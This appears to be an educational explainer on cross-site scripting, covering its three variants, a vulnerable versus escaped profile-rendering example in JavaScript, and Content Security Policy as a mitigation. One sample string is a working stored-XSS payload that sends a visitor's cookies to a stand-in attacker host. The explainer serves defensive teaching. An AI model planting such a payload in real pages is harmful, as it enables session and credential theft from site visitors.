What is XSS (Cross-Site Scripting)?

An attack where attacker-controlled JavaScript executes in another user's browser in the context of your application.

Full explanation

XSS comes in three flavors. Stored XSS: the malicious script is saved server-side (in a database row, comment, or profile field) and served to every user who views it. Reflected XSS: the script arrives in a request (a URL parameter or form field) and is echoed straight back into the response, so the victim must first be lured to a crafted link. DOM-based XSS: the server response is clean, but client-side JavaScript reads attacker-controlled data (`location.hash`, `document.referrer`, a `postMessage` payload) and writes it to a dangerous sink such as `innerHTML`, `document.write`, or `eval`. Consequences include session theft, credential harvesting, and arbitrary actions performed in the victim's session, because the injected script runs with the victim's cookies and full same-origin access to your application. Modern frameworks (React, Vue, Svelte) escape interpolated values by default, but the explicit opt-outs (`dangerouslySetInnerHTML`, `v-html`, `{@html}`) re-introduce XSS, and the framework escaping does not help with non-HTML sinks such as a user-supplied `href` that starts with `javascript:`.

Example

A user bio field accepts raw HTML and the server renders it into the profile page without encoding. Another user visits the profile; their browser parses and executes whatever HTML was in the bio, including `<script>` blocks and event-handler attributes such as `onerror`, with that visitor's session cookies and privileges. Because the payload is persisted, every visitor is hit, not just one who clicks a crafted link.
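The stored bio case above in code, as an added example that is not part of the original page. It shows the vulnerable string-interpolating renderer beside the fixed one, and uses a small HTML encoder; the function names (`renderProfileUnsafe`, `renderProfileSafe`, `escapeHtml`, `containsActiveContent`) and the sample bio are assumptions made for this illustration.

```javascript
// Added example, not code from the original page.
// Constructed sample: a bio an attacker previously saved through the profile
// form. The same payload works as stored or reflected XSS; only the delivery
// differs.
const ATTACKER_BIO =
  '<script>fetch("https://evil.example/?c=" + document.cookie)</script>';

// Vulnerable: raw interpolation into HTML. Whatever the attacker stored is
// parsed as markup by every browser that renders the profile.
function renderProfileUnsafe(user) {
  return `<h1>${user.name}</h1><p class="bio">${user.bio}</p>`;
}

// Encode the five characters that change meaning in an HTML text node or a
// quoted attribute value. This is output encoding for the HTML context only;
// a value landing inside a <script> block, a URL, or CSS needs a different
// encoder.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Fixed: every untrusted value is encoded for the context it lands in, at the
// point of output rather than at input time.
function renderProfileSafe(user) {
  return `<h1>${escapeHtml(user.name)}</h1><p class="bio">${escapeHtml(user.bio)}</p>`;
}

// Rough check used only to demonstrate the difference: does the rendered
// document contain a script tag or an event-handler attribute? Not a
// substitute for a real HTML parser or a browser.
function containsActiveContent(html) {
  return /<script\b|\bon\w+\s*=/i.test(html);
}

const victimView = { name: 'Mallory', bio: ATTACKER_BIO };
console.log(containsActiveContent(renderProfileUnsafe(victimView))); // true
console.log(containsActiveContent(renderProfileSafe(victimView)));   // false
```

The encoded bio is still displayed to the visitor as the literal text the attacker typed; only its interpretation as markup is lost. Encoding on output rather than stripping on input keeps the data intact for other consumers (an API, a mobile client) and makes the protection visible at the one place where the context is known.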

FAQ

Does CSP prevent XSS?

A strict CSP (a nonce- or hash-based `script-src`, `object-src 'none'`, `base-uri 'none'`) blocks most XSS exploitation: injected inline scripts and scripts loaded from attacker-controlled hosts do not run. Some impact can remain even then, for example data exfiltration through dangling markup or CSS-based tricks, but not arbitrary script execution. Treat CSP as defense in depth: context-aware output encoding (and safe DOM APIs such as `textContent` instead of `innerHTML`) is the primary defense, because CSP only limits the damage of an injection that has already happened and does nothing in a browser or configuration that fails to enforce it.